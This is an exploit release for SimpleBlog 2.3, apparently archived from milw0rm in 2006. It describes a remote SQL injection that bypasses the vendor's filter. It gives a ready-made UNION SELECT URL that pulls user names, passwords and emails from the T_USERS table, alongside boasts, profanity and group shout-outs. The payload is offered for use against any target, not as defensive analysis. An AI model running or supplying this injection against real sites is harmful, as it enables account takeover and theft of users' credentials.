_ _ __ _(_)_ __ ___| |_ __ _ \ \ / / | '_ \/ __| __/ _` | \ V /| | |_) \__ \ || (_| | \_/ |_| .__/|___/\__\__,_| |_| AnD _ _ _ _ _ _ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____ | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ / | | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ / |_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___| +-----------------------------------------------------------------+ | Vipsta & MurderSkillz fucking pwnt this webApp | +-----------------------------------------------------------------+ | App Name: SimpleBlog 2.3 | | App Author: 8pixel.net | | App Version: <= 2.3 | | App Type: Blog/Journal | +-----------------------------------------------------------------+ | DETAILS | +-----------------------------------------------------------------+ | Vulnerability: Remote SQL Injection | | Requirements: Database with UNION support | | Revisions: Note - This is a revision of another vuln | | posted by Chironex Fleckeri | +-----------------------------------------------------------------+ | CODE | +-----------------------------------------------------------------+ | Vendor "implemented" a fix for SQL injection vulnerabilities. | | however this bullshit was easily worked around by | | Vipsta & MurderSkillz. | | | | Vendor attempted to remove illegal characters like ' and = | | which stop most SQL injection vulnerabilities. However: | | Vendor failed to remove '>' symbol. | +-----------------------------------------------------------------+ | EXPLOIT | +-----------------------------------------------------------------+ | SQL Injection String: | +-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 | +-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | TIMELINE | +-----------------------------------------------------------------+ | 9/2/06 - Vendor Notified. | | 9/2/06 - Vendor Replied. Threatens legal action. | | 9/4/06 - Exploit Released with no details to vendor. | +-----------------------------------------------------------------+ | SHOUTZ | +-----------------------------------------------------------------+ | Everyone at g00ns.net - including: | | z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, | | TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, | | JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, | | ReysRaged, milf <3, gio, RedCoat, and all who I forgot! | +-----------------------------------------------------------------+ | ADDITIONAL NOTES | +-----------------------------------------------------------------+ | TeamSpeak: ts.g00ns.net | | IRC: irc.g00ns.net | +-----------------------------------------------------------------+ | PERSONAL STUFF | +-----------------------------------------------------------------+ | Sess from g00ns.net IS A FUCKING MORON. | +-----------------------------------------------------------------+ __ ___ ___ / _| / _ \/ _ \| |_ | __/ (_) | _| \___|\___/|_|. # milw0rm.com [2006-09-04]